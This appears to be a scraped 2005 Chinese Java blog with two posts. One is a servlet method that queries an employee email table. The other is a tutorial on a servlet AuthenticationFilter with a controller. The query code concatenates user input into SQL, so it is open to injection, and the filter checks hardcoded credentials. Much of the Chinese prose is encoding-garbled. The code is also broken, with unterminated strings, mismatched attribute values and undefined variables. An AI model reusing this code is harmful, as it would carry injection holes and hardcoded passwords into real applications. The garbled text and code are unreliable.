public String process(HttpServletRequest request, HttpServletResponse response) {
    Connection conn=DBHelper.getConnection();
Statement st=null;
    PreparedStatement pst=null;
    ResultSet rs=null ;
        String query=HandleString.toChinese(request.getParameter("query"));
        if ((query==null)||query.trim().equals("")) query="lmsun";
  try{

     String sql="select * from employee_email where name like '%"+query+"%' or email like '%"+query+"%'" ;
     //st=conn.createStatement();
  pst=conn.prepareStatement(sql);
  rs=pst.executeQuery();
  list=new ArrayList();
  Employee emp;
  while (rs.next()){
   emp=new Employee();
   emp.setId(rs.getString("id"));
   emp.setEmployee_bh(rs.getString("employee_bh"));
   emp.setName(rs.getString("name"));
   emp.setEmail(rs.getString("email"));
   emp.setDepartment1(rs.getString("department1"));
   emp.setDepartment2(rs.getString("department2"));
   emp.setDepartment3(rs.getString("department3"));
   list.add(emp);
  }

  }

   catch (Exception e) {
         System.out.println("Error Connecting to catalog DB: " + e.toString());
       }
   finally {
   DBHelper.close(rs,pst,conn);
   }
   request.setAttribute("empList",list);
   return "/intra/query/emailbook.jsp";

}
   public static void main(String[] args)
   {
     ListEmpAction empaction = new ListEmpAction();
     System.out.print("End");
   }

}

my java 2005-09-27 13:21 发表评论

my java — Mon, 12 Sep 2005 08:27:00 GMT

重定向请�?

　　下面我们来构造一个AuthenticationFilter�q��o器，它的功能是截获对Controller Servlet的请求，然后验证用户的��n份。按照前面介�l�的步骤用向导创��滤器�Ӟ��向导提供了定义初始化参数、过滤器的URL和Servlet映射�{�参数。如果不讄��q�类参数�Q�缺省情况下向导用过滤器本��n的名�U�创��Z��个URL映射�Q�我们将在下面用�~�辑web.xml文�g的方式定义映��，因此现在先认可缺省倹{��注意，如果你想在链中��用一个以上的�q��o器，那就必须手工�~�辑web.xml�?

　　在向��g��点击“完成”按钮后�Q�WSAD立即构造出�q��o器的骨架代码。对于本例来��_��接下来我们唯一的�Q务就是将代码插入doFilter()�Ҏ��Q�如Listing 1所�C��?

// Listing 1: AuthenticationFilter.java

    public void doFilter(
        ServletRequest req,
        ServletResponse resp,
        FilterChain chain)
        throws ServletException, IOException {

        String nextPage;
        RequestDispatcher rd = null;
        //���查用户名�U�和密码
        if (req.getParameter("userid") != null) {
            if (!((req.getParameter("password").equals("password"))
                && (req.getParameter("userid").equals("user")))) {
                ArrayList actionreport = newArrayList();
                actionreport.add("��d����p�|。。�?);
                (((HttpServletRequest) req).getSession()).setAttribute(
                    "actionreport", actionreport);

                nextPage = "failure.jsp";
                System.out.println("获得了来自过滤器的应�{��?);
                // ���请求直接传递给下一个页面（而不是Controller Servlet�Q?
                rd = req.getRequestDispatcher(nextPage);
                rd.forward(req, resp);
            } else {
                req.setAttribute("login", "loginsuccess");
                // ���请求传递给Controller Servlet
                chain.doFilter(req, resp);
                System.out.println("获得了来自过滤器的应�{��?);
            }
        } else {
            rd = req.getRequestDispatcher("Welcome.jsp");
            rd.forward(req, resp);
        }
    }

　　从上面的代码可以看出�Q�在�q��o器中验证用户�w�䆾的方式仍和��^常的一栗��在此过�E�中�Q��ؓ了获得session对象�Q�我们把ServletRequest定型�Q�cast�Q�成了HttpServletRequest。如果用��h��能通过�w�䆾验证�Q�我们不再把��h��传递给Controller Servlet�Q�而是通过RequestDispatcher把请求传递给报告��面�Q�failure.jsp�Q��?

　　如果用户通过了��n份验证，则我们调用chain.doFilter()�Q�允许应�{�进入Controller——这是因��用chain.doFilter()�Ӟ��N��面已�l�没有其他过滤器�Q�所以控制将以POST方式转入作�ؓController的Servlet�Q�实际上�Q�chain.doFilter()��调用Controller.doPost()�Ҏ��?

　　发送请求给Controller之前�Q�我们可以根据用戯��得的�w�䆾证书来设�|�请求的属性，�q�些信息��帮助Controller及其辅助�c�d��理请求。作��Z��个例子，我们讄��了请求的login属性，然后在Controller中检查该属性，Controller把应�{�返回给success.jsp�Q�如Listing 2所�C�）�?

// Listing 2: controller.java

protected final void doPost(
    HttpServletRequest request,
    HttpServletResponse response) {

    // begining codes
    //--用户已通过�w�䆾验证
    if (((String) request.getAttribute("login")).equals
       ("login success")) {
        ArrayList actionreport = new ArrayList();
        actionreport.add("Correct Password");
        session.setAttribute("actionreport", actionreport);
        nextPage = "success.jsp";
    }
    if (dispatch) {
        RequestDispatcher rd =
            getServletContext().getRequestDispatcher(nextPage);
        rd.forward(request, response);
    } else {

        session.invalidate();

    }
    // ending codes
}

my java 2005-09-12 16:27 发表评论